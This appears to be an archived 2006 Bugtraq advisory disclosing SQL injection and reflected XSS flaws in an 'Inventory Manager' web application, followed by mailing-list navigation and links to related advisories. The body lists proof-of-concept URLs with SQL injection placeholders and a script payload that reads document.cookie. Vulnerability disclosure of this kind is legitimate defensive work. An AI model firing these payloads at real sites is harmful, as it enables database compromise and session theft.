Inventory Manager [injection sql & xss (get)]

From: saps.audit@xxxxxxxxx
Date: 14 Nov 2006 13:50:22 -0000

vendor site:http://www.websitedesignsforless.com/
product:Inventory Manager
bug:injection sql & xss (get)
risk:medium

injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=photo&where='[sql]

xss get :
http://site.com/inventory/inventory/display/display_results.asp?category=</textarea>'"><script>alert(document.cookie)</script>

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx

Prev by Date: Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
Next by Date: Car Site Manager [injection sql & xss (get)]
Previous by thread: Evolve Merchant[ injection sql ]
Next by thread: Car Site Manager [injection sql & xss (get)]
Index(es):
- Date
- Thread

Relevant Pages

phpTrafficA < 1.4.2
... Bug: injection sql, xss, full path ... "phpTrafficA is a GPL statistical tool for web traffic analysis, ...
(Bugtraq)
IF-CMS multiples XSS vunerabilities
... full path (array) ... benjamin mossé & laurent gaffié ...
(Bugtraq)
Speedwiki 2.0 Arbitrary File Upload Vulnerability
... xss get: ... full path disclosure: ... laurent gaffié & benjamin mossé ...
(Bugtraq)
infinicart [ multiples injection sql & xss (post) ]
... multiples injection sql & xss ... risk: high ... passwd ...
(Bugtraq)
ehomes [multiples injections sql]
... xss get: ... laurent gaffié & benjamin mossé ...
(Bugtraq)

www.derkeiler.com > Mailing-Lists > securityfocus > bugtraq > 2006-11